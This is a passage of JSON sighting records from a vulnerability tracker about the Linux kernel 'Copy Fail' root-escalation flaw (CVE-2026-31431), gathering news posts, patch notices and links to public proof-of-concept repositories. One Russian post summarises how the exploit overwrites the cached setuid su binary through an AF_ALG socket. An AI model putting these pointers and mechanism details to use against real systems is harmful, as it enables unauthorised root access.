#Correctifs ... \n\nwww.linuxtricks.fr/news/10-logi...", "creation_timestamp": "2026-05-05T08:20:10.711124Z"}, {"uuid": "9c75d540-4bdb-46d7-bd73-3b9557dfc55e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/ctinow/249657", "content": "CISA Adds Actively Exploited Linux Root Access Bug CVE-2026-31431 to KEV\nhttps://ift.tt/tRdwIxP", "creation_timestamp": "2026-05-03T06:54:28.000000Z"}, {"uuid": "4e332feb-ff84-47d9-b556-244eea276a6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/dailyzenntrends.bsky.social/post/3mkrvoyuom32c", "content": "\u4eca\u65e5\u306eZenn\u30c8\u30ec\u30f3\u30c9\n\nLinux\u30ab\u30fc\u30cd\u30eb\u306e\u8106\u5f31\u6027\u300cCopyFail (CVE-2026-31431)\u300d\u3092EC2\u306eUbuntu 22.04\u3067\u5b9f\u8a3c\u3057\u3066\u307f\u305f\nLinux\u30ab\u30fc\u30cd\u30eb\u306e\u8106\u5f31\u6027Copy Fail (CVE-2026-31431)\u306e\u691c\u8a3c\u8a18\u4e8b\u3067\u3059\u3002\n\u4e00\u822c\u30e6\u30fc\u30b6\u30fc\u304c\u30e1\u30e2\u30ea\u4e0a\u306e\u30da\u30fc\u30b8\u30ad\u30e3\u30c3\u30b7\u30e5\u3092\u66f8\u304d\u63db\u3048\u308b\u3053\u3068\u3067root\u6a29\u9650\u3092\u596a\u53d6\u3067\u304d\u308b\u8106\u5f31\u6027\u3067\u3059\u3002\n\u30c7\u30a3\u30b9\u30af\u4e0a\u306e\u5b9f\u4f53\u306f\u5909\u66f4\u3055\u308c\u306a\u3044\u305f\u3081\u3001\u691c\u77e5\u306b\u306f\u30ad\u30e3\u30c3\u30b7\u30e5\u3068\u30c7\u30a3\u30b9\u30af\u306e\u30cf\u30c3\u30b7\u30e5\u6bd4\u8f03\u304c\u5fc5\u8981\u3067\u3059\u3002\nSetUID\u30d5\u30a1\u30a4\u30eb\u5168\u822c\u304c\u5bfe\u8c61\u3068\u306a\u308b\u305f\u3081\u3001\u65e9\u6025\u306a\u30d1\u30c3\u30c1\u9069\u7528\u304c\u63a8\u5968\u3055\u308c\u3066\u3044\u307e\u3059\u3002\n", "creation_timestamp": "2026-05-01T10:19:20.035800Z"}, {"uuid": "e1191054-0693-464a-814e-c2563174d26a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/joostruis.bsky.social/post/3mkrw33ezzs2x", "content": "#MocaccinoOS is not affected by CVE-2026-31431 if you upgraded your system recently (within the past 2 weeks) and are running #Linux LTS kernel 6.18.22 or above.", "creation_timestamp": "2026-05-01T10:26:05.628775Z"}, {"uuid": "a9fde27a-b45b-4b10-b723-2083a5f0492c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ytroncal.bsky.social/post/3mkrwjarkik2h", "content": "Copy Fail (CVE-2026-31431) : d\u00e9tecter, corriger, comprendre loud-technology.com/insight/copy...", "creation_timestamp": "2026-05-01T10:34:01.816363Z"}, {"uuid": "a73902c9-1a0c-4b6c-b3ba-3d8e0c4a2d32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/simonzerafa.infosec.exchange.ap.brid.gy/post/3mkrxr4awrys2", "content": "For anyone following the copy.fail issues on Linux there is now a PoC for Kubernetes as well as the previous LPE one\n\nhttps://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Kubernetes-PoC\n\nGeneral information on the CVE via https://copy.fail/\n\n#Linux #CopyFail #cve202631431", "creation_timestamp": "2026-05-01T10:56:25.138783Z"}, {"uuid": "9cd0e5c2-0a74-4c38-a4a2-a82f72369a3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/bulentgerenler.bsky.social/post/3mkrxtue5tn2r", "content": "Linux Kernel\u2019de 8 Y\u0131ld\u0131r Gizlenen Copy Fail (CVE-2026-31431) A\u00e7\u0131\u011f\u0131 Root Eri\u015fimi\u00a0Sa\u011fl\u0131yor\n\nLinux Kernel'de 8 Y\u0131ld\u0131r Saklanan 'Copy Fail' A\u00e7\u0131\u011f\u0131 Root Eri\u015fimi Veriyor Siber g\u00fcvenlik d\u00fcnyas\u0131, Linux i\u015fletim sisteminin kalbinde neredeyse on y\u0131ld\u0131r fark edilmeden duran bir\u00a0Linux kernel g\u00fcvenlik a\u00e7\u0131\u011f\u0131\u00a0ile\u2026", "creation_timestamp": "2026-05-01T10:57:50.753460Z"}, {"uuid": "cab78d2a-9450-4ce2-976b-a551aac6abef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82301", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431-PocC\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Fulucky0-yuri\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-01 09:57:35\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-31431 C\u8bed\u8a00\u590d\u73b0\u7684poc\uff0c\u53ef\u5728\u76ee\u6807\u73af\u5883\u6ca1\u6709py\u65f6\u8fdb\u884c\u5229\u7528\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-01T10:00:04.000000Z"}, {"uuid": "fe2cce02-7fbb-41a5-b845-c9e75a075d39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Kubernetes.activitypub.awakari.com.ap.brid.gy/post/3mkryhbl5yza2", "content": "Copy Fail: Critical Linux Kernel Privilege Escalation Vulnerability - CVE-2026-31431 Introduction to Malware Binary Triage (IMBT) Course Looking to level up your skills? Get 10% off using coupon co...\n\n#Malware #News\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-01T11:08:50.554672Z"}, {"uuid": "26ba4ac9-ab04-4302-aec6-54aaa2d4a742", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/canartuc.com/post/3mkrzl6ecgx2z", "content": "Theori reported CopyFail (CVE-2026-31431) March 23. Mainline patched April 1. Public exploit, 732 bytes of Python, dropped April 29. openSUSE Leap 15.6 reached EOL April 30 without the fix. Anyone left on Leap 15.6 now ships local-root to every tenant on the box.\n\n#Linux #CyberSecurity #OpenSource", "creation_timestamp": "2026-05-01T11:28:47.266120Z"}, {"uuid": "057fead0-0aa6-42b1-8d98-2b24814c221f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/blablalinux.be/post/3mkrzrp3ops2d", "content": "\ud83d\udea8 Alerte S\u00e9curit\u00e9 Linux ! La faille \"Copy Fail\" (CVE-2026-31431) permet de devenir root sur presque toutes les distribs depuis 2017 \ud83d\ude31\n\nC'est invisible et redoutable pour vos conteneurs ! D\u00e9couvrez tout ce qu'il faut savoir et comment patcher ici : \ud83d\udc47\n\n...", "creation_timestamp": "2026-05-01T11:32:28.495710Z"}, {"uuid": "46225ead-daab-4abf-9196-6570f50f85a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/blablalinux.be/post/3mkrzrp4su22d", "content": "\ud83d\udea8 Alerte S\u00e9curit\u00e9 Linux ! La faille \"Copy Fail\" (CVE-2026-31431) permet de devenir root sur presque toutes les distribs depuis 2017 \ud83d\ude31\n\nC'est invisible et redoutable pour vos conteneurs ! D\u00e9couvrez tout ce qu'il faut savoir et comment patcher ici : \ud83d\udc47\n\n...", "creation_timestamp": "2026-05-01T11:32:29.026762Z"}, {"uuid": "b5b36f42-b227-4a1e-97a8-fe9034b9d968", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosecbriefly.bsky.social/post/3mks266nttb2a", "content": "The 'Copy Fail' vulnerability (CVE-2026-31431) in the Linux kernel allows unprivileged users to gain root access, affecting all major distributions since 2017.\n", "creation_timestamp": "2026-05-01T11:39:24.854315Z"}, {"uuid": "234c6b8c-378e-46b7-a08f-a760d878761a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hack4career.com/post/3mks3m3vj2n2t", "content": "CVE-2026-31431: \"Copy Fail,\" the Nine-Year-Old Linux Bug Introduced in 2017 socradar.io/blog/cve-202...", "creation_timestamp": "2026-05-01T12:05:06.199890Z"}, {"uuid": "863102f2-0ce1-411f-9a77-5cc998c3181a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://vulnerability.circl.lu/comment/5e9c3f17-4570-484f-9113-fab5ca85b815", "content": "", "creation_timestamp": "2026-05-01T12:15:18.044824Z"}, {"uuid": "c680bdb8-8e4a-439a-b108-9dfcc1085457", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/WindoC/355137a084ec29501f5845e0bad88796", "content": "", "creation_timestamp": "2026-05-01T12:05:45.000000Z"}, {"uuid": "d43116be-edd7-4848-aa46-73efc3c95df4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/dglauche/748bef24e5bc35789c8906333804f567", "content": "", "creation_timestamp": "2026-05-01T12:05:10.000000Z"}, {"uuid": "3b0ce899-b940-4a86-b120-b9c0a04d307c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/Carbon16/0e68c4df0e4c7f9c8bbe89d6c69d577c", "content": "", "creation_timestamp": "2026-05-01T11:48:56.000000Z"}, {"uuid": "4ad53413-b3eb-4304-b655-1815202c703a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/thehackernews/8904", "content": "\u26a0\ufe0f A new #Linux flaw mirrors Dirty Pipe\u2014but adds cross-container impact.\n\n\u201cCopy Fail\u201d (CVE-2026-31431) lets any local user overwrite cached system files and run them as root. No race condition.\n\nWorks across major Linux distros since 2017.\n\n\ud83d\udd17 Read \u2192 https://thehackernews.com/2026/04/new-linux-copy-fail-vulnerability.html", "creation_timestamp": "2026-04-30T09:55:15.000000Z"}, {"uuid": "6f10cab0-ca90-4e7b-908d-4f1e1c6796dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/ffbBuRmdSYe3lYPKfhQOupnrAX2e3gYPd5TMJ-uBERknFqY", "content": "", "creation_timestamp": "2026-04-30T11:00:14.000000Z"}, {"uuid": "03a5938d-0d0c-41d9-9f7f-328ddb074a21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/DgINMEwO-LQCHpIR5171X13X7Q7hKGhih-uOGzbTljCnFG0", "content": "", "creation_timestamp": "2026-05-01T03:00:14.000000Z"}, {"uuid": "936b295f-c66b-47b7-ad5a-05cd573ce728", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/evdmPyDv_38pRllzy8Ta91lWQAIqoLwW5wEChicmrjO_C0k", "content": "", "creation_timestamp": "2026-05-01T07:00:13.000000Z"}, {"uuid": "87ad578d-015c-4c7c-b34d-a8e09faef9ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/rYfhm_004exykZ8do5dalE7YB53CRVnjuhduYoE7gKkXMgc", "content": "", "creation_timestamp": "2026-05-01T09:00:04.000000Z"}, {"uuid": "d1ad4413-08de-4c2e-9354-32ded7911b46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mkymuhf3uq2z", "content": "Top 3 CVE for last 7 days:\nCVE-2026-31431: 481 interactions\nCVE-2026-41940: 74 interactions\nCVE-2026-3854: 57 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-31431: 26 interactions\nCVE-2026-41940: 6 interactions\nCVE-2026-5404: 4 interactions\n", "creation_timestamp": "2026-05-04T02:29:57.308285Z"}, {"uuid": "938e4195-244c-44c6-9ed1-e726e74ed076", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82582", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a attaattaatta\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Go\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-03 05:59:11\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-31431 golang hotfix\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-03T06:00:04.000000Z"}, {"uuid": "017a5007-f9a8-4df3-bce2-032f677749d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://thehackernews.com/2026/05/cisa-adds-actively-exploited-linux-root.html", "content": "", "creation_timestamp": "2026-05-03T04:26:00.000000Z"}, {"uuid": "a80de7b2-02c4-4be5-b658-17dbd67e7477", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/3tKSA63ykFsNCx7Ci_YM-GlAoFttSrYjQJCM_fsQcGoJpDo", "content": "", "creation_timestamp": "2026-04-30T15:00:06.000000Z"}, {"uuid": "4bbbf6b1-fcab-4720-b070-a8fd0480fbff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/ilj7-w0C4NWXTAZYwiTR68v2Cg46brLVMoWECZr8IZK8Y9I", "content": "", "creation_timestamp": "2026-04-30T19:00:12.000000Z"}, {"uuid": "eb7831bd-4650-4e3a-ae15-c18660424314", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/yjUnQ6hKYXBxzaCr4Cr42UE0MHqi1VzU3UchLcz_NxtZwAY", "content": "", "creation_timestamp": "2026-04-30T09:00:04.000000Z"}, {"uuid": "3a9778bb-c5e3-44b1-8458-ea67c1a750d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/P45NJHmymloXtZI_QDhqedqg_rJijkJmCthR1UJzeSteIHM", "content": "", "creation_timestamp": "2026-04-30T23:00:10.000000Z"}, {"uuid": "5d1f76d1-95cc-4bea-829a-fae2e663a797", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/k5OTU-9lUzFKUTq8zqq2Ea-jY-aJMqpZsl5nZtaT5jx_Wu8", "content": "", "creation_timestamp": "2026-04-30T15:00:27.000000Z"}, {"uuid": "9cac66a0-3dc7-4986-83ab-44dd3b4ed3ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82432", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a xd20111\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-02 05:57:47\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-31431  Copy Fail - Local Privilege Escalation in the Linux kernel's authencesn cryptographic template via AF_ALG + splice()\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-02T06:00:03.000000Z"}, {"uuid": "e603fb90-d509-4758-8601-597c6cf875d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/opsmatters.com/post/3mkyqmzp7ep2q", "content": "The latest update for #Mendit includes \"PhantomRaven Wave 5: New Undocumented NPM #SupplyChain Campaign Targets DeFi, #Cloud, and AI Developers\" and \"CVE-2026-31431 (Copy Fail): #Linux Kernel LPE\".\n \n#CyberSecurity #DevOps #OpenSource #Compliance https://opsmtrs.com/3zEYo7d", "creation_timestamp": "2026-05-04T03:37:22.796226Z"}, {"uuid": "3c8d5a7e-6492-4932-b97c-3dbcb69fcaa6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ytroncal.bsky.social/post/3mkysl5ppik2h", "content": "Copy Fail (CVE-2026-31431) : Synth\u00e8se technique sur cette faille Linux www.linuxtricks.fr/news/10-logi...", "creation_timestamp": "2026-05-04T04:12:09.994475Z"}, {"uuid": "43a3e76b-c0b3-4dd7-9c46-b7a484cc009a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/c3iq.bsky.social/post/3mkyue4wbfs2a", "content": "Some have suggested that CVE-2026-31431 is a backdoor. What if all the backdoors are found?", "creation_timestamp": "2026-05-04T04:43:58.863859Z"}, {"uuid": "4520e360-cdef-4179-b247-11bc927c9385", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3mkywi2vkq22g", "content": "CISA Adds Actively Exploited Linux Root Access Bug CVE-2026-31431 to KEV\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a recently disclosed security flaw impacting various Linux distributions to its Known Exploited Vulnerabilities (KEV) catalog,\u2026\n#hackernews #news", "creation_timestamp": "2026-05-04T05:21:59.110757Z"}, {"uuid": "32cc9e20-180d-4078-b811-0e39e1c2b9cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/qnap-nas-elevation-of-privilege-vulnerability_20260504", "content": "", "creation_timestamp": "2026-05-03T18:00:00.000000Z"}, {"uuid": "b3f63efb-faa5-42d5-b5f1-0f41c1eb63f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/true_secator/8160", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0440\u0430\u0441\u043a\u0440\u044b\u043b\u0438 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 LPE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Linux, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0440\u0430\u0432\u0430 root.\n\n\u041e\u043d\u0430 \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a CVE-2026-31431 (CVSS: 7,8 \u0438 \u0431\u044b\u043b\u0430 \u043d\u0430\u0437\u0432\u0430\u043d\u0430 Xint.io \u0438 Theori - Copy Fail. \u041a\u0430\u043a \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438, \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u0447\u0435\u0442\u044b\u0440\u0435 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c\u044b\u0445 \u0431\u0430\u0439\u0442\u0430 \u0432 \u043a\u044d\u0448 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u043b\u044e\u0431\u043e\u0433\u043e \u0447\u0438\u0442\u0430\u0435\u043c\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 Linux \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f root.\n\n\u0424\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u043e\u0448\u0438\u0431\u043a\u043e\u0439 \u0432 \u043a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u044f\u0434\u0440\u0430 Linux, \u0430 \u0438\u043c\u0435\u043d\u043d\u043e \u0432 \u043c\u043e\u0434\u0443\u043b\u0435 algif_aead. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0432 \u043a\u043e\u043c\u043c\u0438\u0442\u0435 \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u043e\u0442 \u0430\u0432\u0433\u0443\u0441\u0442\u0430 2017 \u0433\u043e\u0434\u0430.\n\n\u0423\u0441\u043f\u0435\u0448\u043d\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u0440\u043e\u0441\u0442\u043e\u043c\u0443 \u0441\u043a\u0440\u0438\u043f\u0442\u0443 \u043d\u0430 Python \u0440\u0430\u0437\u043c\u0435\u0440\u043e\u043c 732 \u0431\u0430\u0439\u0442\u0430 \u0440\u0435\u0434\u0430\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u0444\u0430\u0439\u043b \u0441 \u0444\u043b\u0430\u0433\u043e\u043c setuid \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u043f\u0440\u0430\u0432\u0430 root \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u043e \u0432\u0441\u0435\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445 Linux, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0445 \u0441 2017 \u0433\u043e\u0434\u0430, \u0432\u043a\u043b\u044e\u0447\u0430\u044f Amazon Linux, RHEL, SUSE \u0438 Ubuntu. \n\n\u0421\u0430\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043d\u0430 Python \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u0442\u0441\u044f \u0447\u0435\u0440\u0435\u0437 \u0441\u043e\u043a\u0435\u0442 AF_ALG \u0432 \u0441\u0432\u044f\u0437\u043a\u0435 \u0441 authencesn(hmac(sha256),cbc(aes)) \u043f\u0443\u0442\u0435\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 \u0437\u0430\u043f\u0438\u0441\u0438 \u0432 \u043a\u044d\u0448\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u043a\u043e\u043f\u0438\u0438 \u044f\u0434\u0440\u0430 /usr/bin/su \u0438 \u0432\u044b\u0437\u043e\u0432\u0430 execve(\"/usr/bin/su\") \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u043d\u043e\u0433\u043e 